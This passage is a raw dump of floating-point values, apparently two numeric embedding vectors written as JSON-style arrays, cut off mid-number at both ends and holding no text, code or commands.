018311715,0.012317815,0.0071185734,0.020460984,0.018398136,0.001422303,0.011486442,-0.0021307995,0.023476256,-0.009520549,-0.015537101,0.00714912,0.009555404,0.0051239096,0.010208478,0.0077892565,-0.008931549,-0.011386524,-0.0030450579,-0.006987897,-0.013004541,-0.009394918,0.01560594,-0.032373305,-0.0071406728,0.0074021914,-0.0032679318,-0.021410054,0.028031038,0.012881221,-0.010409948,-0.021058977,0.01662841,0.019638127,-0.015532617,0.0038343351,0.0015555329,-0.017899891,-0.017022999,0.0061084195,0.016124919,-0.021105677,0.012040279,0.004281758,-0.005940747,-0.021437308,0.023375474,0.025452806,0.014266938,-0.033855803,-0.00676377,0.0054011242,-0.010774843,0.008892065,0.02129414,0.011213244,0.007260276,-0.0037474248,0.001866927,0.011399931,-0.028608615,-0.012877404,-0.00761606,0.01424027,-0.017829265,0.0013473048,0.009510036,-0.0023048907,0.037037924,-0.003094866,-0.025300376,0.012149674,-0.011939784,-0.016850416,-0.007992679,-0.023458684,0.0026888028,-0.009480414,0.015837954,-0.0019831727,-0.015802005,0.0038475117,0.017891122,0.008477511,0.007863956,-0.017342223,-0.023897823,0.005126035,-0.0030141934,0.0020674313,-0.0032986735,-0.049378928,-0.007133739,-0.0074534644,0.07230317,-0.005841074,-0.013490693,0.003870445,0.03394915,0.0133866025,-0.002986723,0.0070604314,-0.018832766,-0.0035859186,-0.0006488809,-0.04681997,0.00019698498,-0.003108404,0.017239336,-0.011907405,0.0024031056,-0.0021029096,-0.012304962,0.012600405,-0.019888226,0.013397652,-0.0065596015,-0.005606185,-0.010822814,-0.04392878,0.003959806,0.0039317217,-0.026622672,0.011063116,-0.0059748376,-0.015863957,-0.0046175225,-0.008920352,-0.011075372,-0.002209104,0.0037683987,0.0058725993,-0.009904808,0.011676067,0.015018092,0.007213935,-0.009451201,-0.019690108,-0.015404512,0.0020859414,0.015100525,-0.0041095726,-0.004344976,0.029898996,-0.015232759,0.017274527,-0.01122552,-0.013524386,0.02043977,0.002360933,-0.0043532443,-0.01474871,0.0044517564,0.0043557556,-0.008116087,-0.01791314,0.008252893,-0.018331537,0.0058702254,0.006273368,-0.0043533263,-0.026492791,-0.011495077,0.004403531,-0.011759875,0.041242447,0.0048385,0.00031629633,0.013545978,-0.010111928,0.008030989,-0.008533985,0.005269021,0.013706048,-0.026955377,0.012733541,-0.011610015,0.006559078,0.004102656,-0.0042179045,-0.02095732,-0.012070851,0.0010810614,-0.009093329,-0.0023277486,0.011028186,-0.014901516,0.007940535,-0.008132922,0.0048964,0.015498233,0.019759104,-0.007704625,-0.020663425,0.012263094,-0.0095347585,0.022183403,-0.015381992,-0.011400677,-0.009781902,-0.104087844,0.0010709581,-0.011459995,-0.014119963,-0.011262435,-0.007378693,0.028946402,0.08563085,-0.00529036,-0.038248852,0.0025904044,0.024017522,0.024497153,0.01032378,0.00058720174,0.029298203,-0.0054420875,-0.013376652,-0.0039800494,0.0011139971,0.018016119,0.010692558,0.0058903056,0.006728917,-0.012335847,0.03175099,-0.005971071,0.016922131,0.024748119,0.014466037,0.0033938668,0.0054178075,-0.0064000445,0.006430726,-0.018197019,-0.00095185026,-0.004092782,0.014739525,-0.00024201145,-0.00067155925,0.005022659,-0.004129606,0.006391147,0.036864217,-0.003339435,0.0013179537,0.03019465,-0.005774823,0.01670679,-0.00970662,0.02393776,-0.02002189,0.03077155,0.008713178,-0.003451691,0.01101542,-0.024320964,0.021396648,0.017631704,-0.0073267426,0.0050265035,0.02233152,0.0148040885,-0.013163879,-0.017576313,-0.0053508617,0.00049567467,-0.0023044527,-0.013609943,-0.014626781,-0.006627664,0.008652914,-0.012961689,0.006103128,-0.0067071244,0.003556335,0.022180071,0.018995965,0.018325284,-0.0017513635,-0.017640429,-0.007822029,0.013481054,0.024680585,0.008607657,0.012398611,-0.00085002236,-0.0038795457,-0.019819938,-0.024642117,0.020822624,-0.0029412422,-0.019060684,-0.01877402,0.004771762,0.0030625504,-0.011075976,0.03657798,0.023514956,-0.015229341,0.0082630785,-0.0050387206,-0.009430556,-0.01852562,-0.07192481,-0.007026776,0.031902917,0.001786885,-0.015480582,-0.0017321861,-0.024610188,-0.0052295784,0.010984911,0.003449046,-0.031296656,0.007738843,0.016788218,-0.0020919114,-0.0004263078,-0.0038570873,-0.04279813,0.018306075,-0.004424735,-0.01262106,0.006402098,0.0024168082,-0.04072062,-0.0002008109,0.009321992,-0.010291741,-0.0015833003,0.018402848,0.018188149,-0.024043877,-0.0049073054,0.0014019146,-0.0055628237,0.013601449,0.010567065,-0.027978893,-0.010412535,0.0013696824,0.0034161888,0.013197526,0.010029177,-0.010197383,0.0040862705,0.007788404,-0.0062529277,0.017907698,-0.014982462,-0.014188527,0.023072885,0.0064521544,-0.012794427,0.003914515,0.007846058,0.003977301,0.010027271,-0.008145618,-0.015374418,-0.009034733,-0.0236372,0.013180354,-0.022287628,0.017459882,-0.007006306,0.004262946,-0.0060463403,0.03089291,0.008272366,-0.0069657704,0.013015252,-0.016110597,-0.015846452,0.0092193,0.025465451,0.00048372376,0.012569977,0.025179682,0.008212563,0.019508654,0.016459316,-0.021498367,-0.01860649,-0.009560342,-0.026288966,0.020175703,-0.0039714193,0.007359603,0.00257345,0.020193774,-0.006708279,0.028678752,-0.006218325,0.04018595,-0.0065011326,-0.010618321,0.027649723,0.02346817,0.014023395,0.01037819,-0.004580999,-0.0042763255,-0.039660037,0.011561281,-0.00746019,0.0024546455,-0.013777969,0.009776409,-0.00091333024,-0.018403785,-0.006818052,0.0092449235,0.009530253,0.009923258,-0.020527842,0.01202032,-0.029495528,0.0037281213,-0.0024580774,-0.017012356,-0.0128413495,0.02490011,-0.012439699,0.02030458,-0.001648034,0.0004144699,-0.036264118,0.006358412,-0.021965021,0.019034045,0.009967567,0.0013942063,0.0047746478,-0.008547468,0.0262468,-0.035353694,-0.03149497,0.008679343,0.022781633,-0.008285501,0.022175133,0.0036071963,0.0014701226,-0.0062629976,0.008249258,0.004024345,-0.014170066,-0.012568417,0.0043064044,0.0059296875,-0.0011836634,0.01989815,-0.017482417,-0.009703229,0.00090206927,-0.00207796,-0.02653371,0.010502372,-0.019604383,-0.0022998503,-0.00652628,-0.012070514,0.0055565797,-0.0045113494,0.006646516,-0.00416034,-0.009558295,-0.0073828064,0.013323314,-0.011232363,0.00027222556,-0.015628848,0.005373877,-0.010087328,-0.0040250095,0.000772259,0.019909175,0.030442037,0.010763962,0.03364113,0.011766322,0.01902027,0.020124903,0.017947916,-0.01423426,-0.0016689297,0.023094194,-0.0012327218,-0.012167187,-0.00961086,-0.008886828,0.008302413,0.023954468,0.0002580743,-0.023825437,0.009860219,0.01601682,0.0055391015,-0.00061322644,-0.00028976687,0.024303943,-0.01933038,-0.009296283,0.033790685,0.010700211,-0.0031739557,-0.0027136623,0.0014167186,0.0031237479,0.013718253,0.024598973,-0.005949976,-0.015538506,-0.0040836437,0.012247224,0.017248226,0.01581916,0.046371303,-0.008017813,-0.02692578,0.01009251,-0.0019768886,0.015215656,-0.0029560633,0.010482678,0.0026300866,-0.013141095,0.033972748,0.022499293,0.008568234,-0.010294843,0.009151735,0.012848387,0.007553542,-0.0056019234,0.009578029,-0.011988829,0.0027889223,0.009825308,-0.010143763,-0.008987135,-0.001952776,-0.00072269473,0.019444918,0.014272451,-0.00340662,0.0061537796,0.0014487302,0.016688962,-0.0076409616,-0.01583512,0.0017114063,0.018123323,-0.010392317,0.0029451163,-0.010047181,-0.023594521,-0.001160071,0.0165763,-0.0031686805,-0.0023462612,0.006514733,-0.019789344,-0.00730904,-0.011554044,0.023785846,0.0019103403,-0.009362514,0.022245618,-0.025236875,-0.0025985006,0.013387712,-0.01083441,0.0011999797,0.00023611574,0.007562939,0.045407776,-0.005832698,-0.008442792,-0.00850679,0.0020831388,0.00593687,-0.0038752162,-0.025049645,0.0013562314,0.007201712,0.013583511,0.0016936589,-0.0137196835,-0.0062222495,-0.004696653,-0.0013980923,0.0042817597,0.011690691,-0.012166762,-0.015434073,-0.020438856,0.013509483,0.03856476,-0.006153137,0.0016546729,-0.008124895,0.002913569,-0.016462838,-0.00020874447,0.012004291,0.0019331588,-0.017990377,-0.007605233,0.0072075143,-0.007752719,-0.016127246,0.004932841,-0.007251842,-0.019082788,0.014879426,0.010127308,-0.0058633033,-0.029117709,0.0020147644,0.0026760665,-0.011861058,-0.015139225,-0.018774776,0.031647254,0.0011700294,0.016756127,0.013857644,0.022864211,-0.01499139,-0.0036223093,0.0057825097,0.019526156,0.097949915,-0.0006879138,-0.0074885422,0.0052850125,0.0046735555,0.006937777,0.017237678,0.0063146506,0.021515287,0.00842404,0.011799329,-0.0020874527,-0.008937993,-0.017941589,-0.00778445,0.0051648747,-0.004836278,0.012721102,0.0071525434,-0.017837014,-0.0015873376,0.010248859,0.035817634,0.0043320945,0.0024555912,-0.012993888,-0.0019949637,-0.00068913435,0.016458282,-0.021502243,0.009786464,0.010381902,0.0068491334,-0.008349943,-0.014823314,0.0045718485,0.0024336565,-0.023289071,0.004674559,-0.006915767,0.00979648,-0.025218168,-0.011943909,-0.006757903,-0.08441909,0.005666048,0.018502131,-0.012168209,0.013438548,0.014540227,-0.017664153,-0.0054935766,-0.010494078,0.011371411,-0.029799404,-0.0068108626,0.0008113262,0.0142546175,0.011873366,0.0033919031,0.0016330942,0.010251823,-0.00541701,0.014484544,-0.011970045,0.03966627,0.016424444,-0.012857149,0.0055548786,-0.0006941245,-0.00429739,0.004092483,-0.0004868998,0.0020851423,0.014781935,-0.013436361,-0.024313774,-0.009167695,0.007913796,0.0154876765,0.008698055,-0.006174937,-0.0051654237,-0.04183116,-0.004237133,0.0020730558,0.022080785,-0.016676309,-0.0045892717,0.026812436,-0.00782432,-0.014499088,-0.032266393,-0.006306672,0.011553749,0.020562947,0.0022091826,0.026206054,0.016338129,-0.0063122017,0.00008094334,-0.006713023,0.029618638,0.002323217,-0.010610062,-0.0039987615,0.025671965,-0.014158764,-0.010758778,0.009873273,-0.0071702558,0.0036584237,-0.021387422,-0.0066142143,0.0006470255,-0.006075086,-0.014927997,-0.0056646685,-0.0028843821,0.0026529683,-0.022201952,-0.008364938,-0.005546388,0.009729372,0.011857148,-0.0030421226,0.013003438,0.0017547448,0.0057070013,0.021044191,-0.0100106,0.024377808,0.031095274,0.024317697,0.02372663,-0.0021452869,0.007557295,-0.0065345163,-0.017592225,0.007074163,-0.011880025,-0.017058514,0.020972846,0.015022288,-0.010188709,-0.009390538,0.0020122402,-0.009519408,-0.0058841817,-0.012936861,-0.0056150123,0.003501941,-0.0051066605,0.012860234,-0.0024797127,0.016248498,0.029717892,0.0074988813,0.024223616,0.007998821,-0.007566363,0.016387966,-0.016832724,0.016262868,-0.017513433,-0.03452168,-0.010190138,0.007553663,0.0038064425,0.0033976773,-0.007225508,0.000057251007,-0.011004984,-0.012151159,-0.019223459,0.016235044,0.03036849,0.01841001,0.010217688,0.026182903,0.029232534,-0.0029131651,-0.006769011,0.015263735,-0.006830114,-0.043220416,-0.011580017,-0.00094340433,-0.005033673,0.03612199,-0.0066814693,-0.011005713,0.0062045576,-0.0025143563,0.005902094,-0.00656098,0.008919128,0.0016262953,-0.009290287,0.0054764473,0.009193455,0.003446671,0.009939679,-0.019938247,0.00034535964,0.023303604,-0.0061253533,-0.00010089742,-0.021669144,-0.0036625322,0.008171411,0.009336888,-0.023342585,-0.04031685,-0.019696012,-0.0031520936,0.002469564,-0.009629041,-0.0057133706,0.017390389,0.03205354,0.009854243,-0.009498262,-0.010173736,-0.010375775,0.002146016,-0.015101529,-0.003959549,-0.017527452,-0.009733864,-0.011006446,-0.004904287,-0.012426026,-0.01928161,0.007775741,-0.006040723,0.016221005,0.01689287,-0.037293267,-0.007200376,0.006479858,-0.015815688,-0.00051839004,0.032989938,-0.01506285,0.01135594,0.0052508814,0.014776173,0.0047782445,0.014179336,-0.0006777345,-0.0044910824,0.007368484,0.0108019635,0.003366663,0.013702607,0.0071922354,0.098621204,0.03043335,-0.018663058,0.005240534,0.0013873999,0.002849687,0.023640564,-0.0051500075,0.01621354,0.01770187,0.012630978,0.01086788,0.0050221635,-0.005260305,-0.0141161345,0.007930574,0.009187301,0.0015585681,-0.01691167,-0.01477547,0.013769239,-0.034825094,-0.0046332893,0.0012062538,0.003069876,-0.063584276,0.015628243,0.045421004,-0.0030730292,0.015468339,0.016391935,0.015092005,0.02432651,-0.006886112,-0.024161568,-0.02052584,0.012831027,-0.011659987,-0.0017050647,0.0024918644,-0.0072396914,0.022280509,0.004937842,-0.00431382,-0.014170339,0.019833047,0.009258924,-0.0049956297,0.019525416,0.006245271,0.009697937,0.019145865,0.027979935,0.0051997895,0.021722652,-0.0036464918,-0.014508203,-0.004891751,0.0076712687,0.003282829,0.03739048,-0.023267368,-0.00008019756,0.022461122,0.024812717,0.012779971,-0.027028833,0.0077406177,-0.047485806,-0.023905994,0.034907497,-0.02592257,0.004280489,0.0054353774,-0.016796691,0.016668918,-0.009938279,-0.024660727,-0.00988172,-0.009009396,0.004693666,-0.0033673819,-0.004204813,-0.004730021,0.01596403,0.017402211,0.00043363945,-0.0031150614,0.0071961326,0.004661859,0.021229804,-0.002823449,0.0025924894,-0.023377301,-0.008204851,-0.025552949,0.02488216,-0.017225403,-0.001827627,0.016062876,0.009889661,0.0021204008,0.004594395,0.008521901,-0.029101726,-0.011516758,0.02390362,0.038236484,0.011230019,0.00614066,-0.019383943,-0.0012963191,0.009924162,0.013463071,0.0007678161,-0.012931232,-0.0027167574,-0.031449504,0.016989809,-0.010689189,-0.0022703758,0.011987005,0.018066457,0.018138189,-0.0024391385,0.012965296,-0.008213924,0.015952641,0.011961587,-0.0086589735,-0.0069501325,-0.036943585,-0.026823498,-0.0021600889,-0.008451765,0.018184645,0.034329046,0.0024539377,-0.0017532464,0.0036968584,0.0115725305,-0.0002376753,-0.021812635,-0.008777391,0.008369539,-0.0024725562,0.007759909,-0.002667997,0.011448942,0.010390895,0.0057671797,-0.0045148837,0.013092326,-0.025305023,-0.022038069,-0.01907038,0.00043571522,0.00067870447,-0.013796831,-0.0019206571,-0.0039340085,0.00072479225,0.008960035,-0.046804152,0.016393784,0.002945731,0.018273085,-0.002771616,0.012324241,0.008282004,-0.0067801126,-0.02408515,-0.01938045,0.010330141,-0.005295465,-0.013931313,0.0031833006,0.007843279,-0.015768798,0.0011545662,0.027719218,0.027641587,-0.015131899,0.027523521,-0.005943982,-0.010124429,-0.008875688,0.000048080565,0.00576354,0.03159517,-0.009950624,0.03041617,0.0037081707,0.010059258,-0.00021467275,0.008942694,-0.03484277,0.050587505,-0.008403549,-0.05075716,-0.010081876,-0.0070935553,0.00036803872,0.00089255924,0.014950216,-0.010976624,0.014090263,-0.014887957,-0.0021455174,0.010935963,0.011460522,0.015463158,0.011465501,-0.0134289125,0.00410624,0.008098682,-0.027189707,-0.0066478783,-0.015188333,-0.0013176451,-0.011917814,-0.010805003,-0.025673077,0.017759537,0.00014407688,-0.024131356,-0.00437188,0.018069834,0.017584277,-0.006630348,0.0062658833,-0.0027885272,-0.025141118,-0.012542955,-0.004276411,-0.0050343904,0.018380485,0.00803977,-0.010046436,0.0053254142,0.0017506604,-0.009395312,-0.008247185,0.0030628908,-0.018779261,-0.016723858,0.01005601,-0.01040069,-0.0113627575,-0.023294702,-0.015918698,0.0157501,-0.014624463,-0.0059711537,-0.028216109,-0.032257408,-0.017778393,0.010450711,0.011205259,-0.008273324,0.0054785064,-0.011157094,0.018795889,0.014542337,0.0035060744,-0.0028866476,0.02016878,-0.015112738,-0.007246091,-0.02514741,-0.018362882,-0.02517102,-0.010955993,-0.013689979,-0.020988008,0.014268064,-0.0155845005,-0.00864228,-0.01029826,0.02823475,0.0065474804,-0.04242025,0.03293561,-0.015758421,0.014673549,-0.008382563,0.022776077,0.008312531,0.045763865,-0.040718324,0.007464145,0.050143678,-0.0024888704,-0.016519709,0.018593665,-0.006975023,-0.06305528,-0.018515214,0.04315979,-0.000614157,-0.03745118,0.0024072602,0.0068663503,0.007457545,-0.007355844,-0.00960245,0.009265237,-0.0038296983,-0.00042749647,0.024890088,0.008594633,0.0013457005,-0.01168879,-0.02280895,-0.013416919,-0.0069287135,0.005865612,0.008353624,-0.0014128496,0.021985222,0.021764759,-0.013388388,0.009399093,-0.001483746,0.0066005914,-0.018506587,0.025268275,-0.0035835041,-0.03025997,-0.016938413,0.010824884,-0.013925106,0.009370746,-0.02089028,-0.011298977,0.008006605,-0.0051586446,0.15490092,0.016565591,-0.0046740575,-0.0020929445,0.00397125,-0.013586844,-0.025077123,0.011585421,-0.003679761,0.013920495,-0.014582749,-0.016947323,0.015845904,0.01724901,0.026374768,-0.010314225,0.012981597,0.16391991,0.0011343461,0.009665839,0.013056278,-0.011921723,0.028181368,0.011780894,-0.00390445,-0.0320055,0.00091240834,-0.029088309,0.017469194,-0.0070575047,-0.015410245,0.003929855,-0.0019273032,-0.008342239,0.013369175,0.021596285,0.0049334895,-0.026470687,-0.021637697,-0.0100788195,0.0064409925,-0.021799468,0.002131096,0.008560757,0.012738962,-0.005644133,-0.0000023174714,0.009073852,0.030323466,0.04063705,0.016176,-0.00743974,0.00699356,0.009550741,0.018083889,0.003808159,-0.0033407486,0.0013758194,-0.02153359,0.033032678,0.010385647,0.00540442,-0.03168129,-0.0025542956,-0.021229034,0.00015601979,-0.0028261258,-0.006950499,-0.013162938,-0.011093925,-0.008773573,0.011835349,-0.012611571,0.0025184539,-0.006053841,0.002230374,-0.004011169,-0.010654061,0.012789573,-0.025530837,-0.0029749644,0.024340348,-0.016657215,-0.0025365592,0.021505468,0.011500344,0.0019631456,0.00809857,0.003782714,0.018859394,-0.016756497,-0.003377691,-0.003843638,-0.0017201712,-0.0024945294,0.018955974,0.013906929,0.005200132,-0.011775844,-0.019195661,-0.015826847,0.0032654325,0.002677882,0.030707765,-0.00443698,0.02002017,-0.010806614,0.0048655816,0.0020446836,0.0028097704,0.0156666,0.019025264,-0.01107609,0.005315024,-0.031693686,-0.012630041,0.008737378,0.01786169,-0.01610382,-0.004711241,0.000161656,-0.013646852,0.022673812,0.0063991398,-0.03386714,-0.0006080485,0.0014416022,0.010810679,-0.011922766,0.017551068,-0.01239083,0.0042351135,0.0044172495,-0.0011535517,0.016826516,-0.0031258233,-0.004651464,-0.020608366,0.002237806,-0.014538968,-0.0053584897,0.024052916,0.005934098,0.018753104,-0.01720334,0.02062587,0.0032493875,0.012363852],[0.00946573,0.012732964,0.0020960672,-0.014487315,-0.006746646,-0.022421854,-0.014776924,-0.0066193757,0.0320484,-0.0051081777,0.0021535608,0.034974582,0.0060934634,0.0018180059,0.000044322496,-0.004082905,-0.0017803215,0.0032845058,0.0013193031,-0.001926969,0.00019176146,-0.0136213405,0.0059568677,-0.005359734,0.003151849,0.008524527,-0.008952772,-0.016183846,0.011072138,0.010158588,0.009757456,0.024768803,-0.00486711,-0.009144954,0.0075275325,0.008353394,-0.014376642,-0.010195919,-0.0024958474,-0.004657313,0.008116026,0.01058092,-0.002188812,0.008079301,-0.008270067,-0.018912481,0.0012760817,0.015965888,-0.019407067,0.0064502046,0.015860723,-0.006323914,-0.017771726,0.0009168972,-0.009120705,0.026981551,-0.013004432,-0.026401645,0.024369461,0.0012003087,-0.021351729,0.021663874,-0.01057066,-0.003842371,-0.0020692209,-0.026868414,-0.0049363296,-0.023134248,-0.012399057,-0.0005836054,0.03252731,-0.01692623,0.0050867554,-0.0028715236,0.001478557,0.026403077,0.013324742,-0.01681394,-0.015929759,-0.007827122,-0.026107587,-0.0042094444,0.020698827,-0.006036287,0.0030033868,-0.0026685216,-0.00953319,-0.0053513,0.00892636,0.0033244467,-0.012081515,-0.011319416,-0.011887403,0.016736133,0.0041826735,0.022070378,0.041661147,0.0059269676,-0.0103713125,0.0034400048,0.011121012,-0.006018741,0.0097127035,0.00833139,0.009494705,-0.01083688,-0.004822669,-0.011623991,-0.023774607,-0.0059145913,-0.009099359,-0.004034063,0.0013663721,-0.022828575,0.00922905,-0.0070893345,-0.0013205191,0.014808962,-0.031016083,0.0015320942,0.005634468,0.012009855,0.013109849,0.0010030799,0.009329476,-0.004196524,-0.0004909823,0.0045204586,0.0097955745,-0.01108646,0.0018203141,0.0090944525,-0.011684378,-0.005133087,-0.012850928,0.0039267214,0.008798968,-0.0001632319,0.021595508,-0.012822692,0.019869624,0.0073967227,0.020209203,0.008431626,0.000028125358,0.007828744,0.0056787436,0.011696285,0.025991233,-0.0035236215,0.009507866,0.010833534,-0.014128431,-0.009571052,-0.016669411,0.014769418,-0.011567888,-0.018916614,0.008715163,0.009942078,0.017466884,0.0016980367,0.009312197,0.008774281,0.004677549,0.006339315,-0.02744195,0.0028068116,-0.01887707,0.004663996,0.0135571165,0.024780529,0.0035498657,-0.012636915,0.01153765,0.009802533,0.006835988,-0.01335211,0.011152644,0.023082927,-0.018809643,0.027165804,-0.000040579853,-0.006802839,0.0016443438,0.02121015,0.0026508628,0.0080958195,-0.013543347,0.011465449,-0.009327861,-0.03502572,-0.01727357,-0.01110702,-0.00009936685,-0.018183194,-0.012434991,0.09556967,-0.015541855,-0.008239911,-0.025733646,-0.009465188,-0.0053100344,-0.0008115028,-0.014653426,-0.019016657,-0.025461154,0.011496094,0.011300583,0.0037131957,0.022438549,-0.011722655,0.01918692,-0.008253846,0.00020066553,-0.08170418,0.035411984,0.029378565,-0.0055804956,-0.0059226356,0.0035489516,0.009259453,-0.01488152,-0.015462426,0.00011619967,-0.0116598625,0.0033984042,0.010920848,0.00047178374,-0.018435236,-0.007706926,-0.004572738,-0.015703656,-0.0066714818,-0.022789419,-0.03438492,0.011269128,0.0025486662,0.009593312,-0.0147456145,-0.011317137,0.018597435,0.030927911,0.013015398,-0.017561017,0.0031541702,-0.005432188,0.0039705564,0.007253857,-0.018137833,0.00473032,-0.0066936044,0.022167677,0.011876838,-0.001629353,-0.028696867,-0.0050862525,-0.007293433,-0.01121228,0.009559293,0.0009605594,0.013285881,0.00019737861,0.016297214,0.032872524,-0.0059849103,0.010830816,-0.041178267,0.001176713,-0.019784033,-0.035277646,-0.003472162,0.03045757,-0.036863953,-0.01339753,0.019240072,0.04041618,0.009175136,0.006634498,-0.034353238,0.0002428807,-0.019395845,-0.02580187,-0.02252402,-0.025093913,-0.000025265083,0.010094486,-0.012418261,0.019210765,0.01868768,-0.016160583,0.010760924,0.014049634,-0.0016450374,-0.01437513,-0.0088578155,-0.00693652,0.0078039924,0.0071647596,0.0056280424,0.0027380884,-0.006019275,0.014530568,-0.0071618883,0.012453652,-0.0013902958,0.009876395,0.019570218,0.02850199,0.01578348,-0.019277608,-0.0010076188,-0.0070922337,-0.00726707,0.009899677,-0.010654705,0.03002788,-0.026190529,-0.017148718,0.014342317,0.018704955,0.005271863,-0.012639214,-0.008414391,0.0029385146,-0.011343362,0.022324577,-0.012098672,0.01968942,-0.0024003095,-0.002649174,-0.0032477211,0.008340451,0.021750115,-0.030727554,0.027064018,-0.0013403295,0.014902945,0.005533134,0.021223666,-0.0067460835,-0.028376276,-0.010689643,0.0043223114,0.014589815,-0.025874708,-0.0008231673,0.0050722985,0.013102059,0.016441688,-0.017048672,-0.01733481,-0.027176958,-0.012830839,0.0004981265,-0.00138512,-0.0039250576,-0.017694423,-0.0076061566,-0.0041541304,0.020446245,0.0029897066,0.006941347,-0.016902499,0.047339782,-0.014241664,-0.013847649,0.015565293,-0.016251007,-0.011692214,0.057590537,0.010800038,0.0040170723,0.013411552,0.001200234,-0.01494101,-0.0058498657,0.009873361,-0.012240346,-0.001586622,-0.02884334,0.0076608905,-0.021029934,-0.011802116,0.020364938,0.01643576,-0.011313892,0.019379409,0.02656386,0.024068525,-0.02066305,0.00960703,-0.0025862635,-0.006183007,-0.01946914,-0.009911799,-0.006208847,-0.019629635,-0.029492108,0.016771195,0.0025125223,-0.005995015,-0.013285965,-0.00840951,-0.011536339,0.006170497,-0.00084732246,-0.0042462754,-0.026111409,0.012603345,0.007886436,-0.015307406,0.002754368,0.010452334,0.0063959495,0.02735987,-0.027134314,0.026808146,-0.011456224,0.007226488,0.014736218,-0.014289201,0.012029056,0.027405748,0.024890332,0.021669423,-0.042428795,0.036595743,0.021210203,0.045941655,-0.005078955,-0.012051468,-0.004126255,-0.009400292,0.022513578,0.020921636,-0.001294112,-0.011045539,-0.00598807,-0.000038109894,0.002951262,0.0031354458,-0.01537189,0.013062919,-0.00401679,-0.0045351633,-0.003537934,0.0027403277,-0.011787241,0.0029255652,0.012027791,0.009644766,0.01932486,-0.01013391,0.016560106,0.010501286,0.01747358,-0.008789688,0.0023512777,0.022327365,0.019498475,-0.03135652,-0.015230321,0.019930592,-0.011244297,0.030822959,-0.010553598,-0.0045056245,0.0044213342,0.009769996,-0.0023772477,-0.017974246,0.0009015279,0.05561136,0.0020639393,0.021585388,0.01310256,0.0048477477,0.0046250867,0.0011496291,-0.00063245575,-0.0024375774,-0.019107899,0.015908021,0.02161516,0.015545439,0.011169956,0.008936836,-0.03144397,0.013539307,0.0014711127,0.01891002,0.018647349,0.015023685,0.0024815649,0.028732952,-0.0049734954,-0.04203508,-0.0224259,0.006508353,-0.0016262215,-0.015911592,0.02029441,0.00014568512,0.016886584,0.01036839,0.017718947,0.011859841,-0.0060751885,0.015049459,0.026329301,-0.00061519403,0.018284164,-0.0152479755,-0.01192279,0.003104152,0.0063588596,-0.0077774688,0.0035308152,0.010874293,0.019652875,-0.019082228,-0.010321171,-0.014252522,0.052261014,-0.015086058,0.02071472,-0.00017098027,-0.005820841,0.0010282674,0.012821655,0.08041531,-0.030148432,-0.039474163,0.0009900542,0.01333535,0.00056803593,0.0029069558,-0.0036342558,-0.0153447855,-0.024141056,-0.00081802334,-0.0060905856,0.0018191737,0.015428454,0.0035667273,-0.007875073,0.02639733,-0.0032531724,-0.003907378,-0.007146448,-0.011659473,-0.0030769904,-0.022783944,-0.048904326,-0.009931444,0.009945543,0.02136313,-0.007828282,0.00591203,-0.00059371867,-0.019551743,0.01922112,-0.0020771718,-0.0012076823,-0.0051753484,0.024756692,0.0071280478,0.004285276,-0.0019103098,0.020610904,-0.00726187,-0.0010265295,0.025811974,0.003760518,0.00799614,-0.018555438,-0.02253408,0.02337261,0.000447139,-0.016481543,-0.009746699,0.0014855481,0.021129642,0.018522931,-0.0049803657,-0.018759197,0.017761914,0.020162856,-0.013276187,-0.008772668,-0.009926744,-0.0020096935,0.0029511137,-0.009335337,0.008737994,0.011865497,-0.017204054,0.00035333546,-0.0027159583,-0.027363613,0.008562989,0.0062774727,0.0059273336,0.0048013865,0.0077251075,0.0017465366,0.01733341,0.02592161,0.008691569,-0.009432352,0.011335711,0.008492514,0.006032232,0.004909817,0.015451562,-0.0015068578,-0.012416855,0.016961664,-0.008485766,-0.017839646,-0.0003821104,-0.0028855775,0.018424407,-0.015403371,0.012069811,0.018597208,0.0057013254,-0.014221238,-0.008602456,0.004329317,-0.027969398,-0.04213263,-0.020022811,0.026241362,-0.007770666,0.020611925,0.008212282,0.022939285,-0.0072119744,-0.013955007,0.00018734408,-0.075216934,-0.0013451546,-0.0016864971,0.017688785,-0.0046575544,0.03766818,-0.011146647,-0.01859478,-0.0029320351,-0.003706527,-0.012710127,-0.0055893874,0.005993483,0.0036141048,0.017398475,0.02213513,-0.021374606,-0.0294697,-0.012457945,-0.03702909,0.015062779,0.021413796,-0.0071887,0.009378992,0.0061479076,0.01261308,0.00048336657,-0.012694863,0.001501464,-0.003008789,-0.00007440488,0.016592935,-0.028200062,-0.010385027,-0.047319617,-0.009436968,-0.016599115,0.004773938,-0.013785377,-0.002882209,0.0076550413,-0.003949032,-0.019836476,0.013524519,-0.0075562946,-0.0034988313,-0.023014579,0.019189818,-0.015410665,0.047129586,0.0059503336,0.032204904,-0.008406393,0.005955718,0.016460832,-0.011616504,0.00016760861,0.034770355,-0.011919783,0.006203666,-0.0036421733,-0.0050982414,-0.0035148552,0.005903587,-0.0021214215,-0.011208552,0.01910563,0.00998245,-0.0046608504,-0.0046978323,-0.009898717,0.013763436,0.021941783,0.014858875,0.010384184,-0.0049169534,-0.005970361,0.029929161,0.009408055,-0.012438462,0.0062190685,-0.020278791,-0.036569014,0.018584155,0.006490254,-0.010475142,0.0016607617,0.0013876979,0.008636091,-0.0132570695,-0.006402881,0.000494914,-0.022543391,0.0010462881,-0.00023106755,0.0015048488,-0.023982463,-0.030769635,-0.00080713275,0.009149894,0.012620211,-0.033479314,-0.012328867,-0.0012373042,0.0019177536,0.009050378,-0.044295773,-0.03360049,-0.006401308,0.01292843,-0.008956844,0.018089304,0.006171586,0.0021568898,0.0028402323,0.019277014,0.006276771,0.0020394798,0.0053231413,-0.015159864,0.018376954,0.02243305,-0.011278998,-0.028532578,-0.021078119,-0.0018370665,-0.0014468087,-0.013590071,0.021430226,0.020773308,0.04472942,-0.0027124884,-0.015060299,-0.0006961384,0.014904524,-0.0058627995,0.0069691204,-0.036848564,-0.019220829,-0.013688753,0.015151286,-0.004131318,0.0015429745,-0.02035947,0.03217719,-0.0010050975,-0.0062476653,0.013962295,-0.007093488,0.01822444,0.015792051,0.013391183,0.011176413,-0.023623193,-0.031916775,0.03317701,0.0031345221,0.0013337918,-0.0288071,-0.021280576,-0.000095675176,-0.020593982,-0.00028143407,-0.012640675,-0.012034897,-0.0068652877,-0.034412786,0.017386755,0.0022722927,-0.0061419555,-0.011802271,0.0019650727,-0.016021695,-0.01668591,0.012585792,-0.013928443,-0.033986475,0.018395629,-0.0070169414,-0.01996873,-0.0023015824,-0.017409401,-0.029875368,0.0015722495,-0.008552854,0.0022630736,0.019426147,0.016170694,-0.017730368,0.0035210624,0.0060129855,0.008804637,0.018025253,-0.030206803,0.0058696405,0.003371963,0.0060625677,0.013856558,0.007369542,-0.02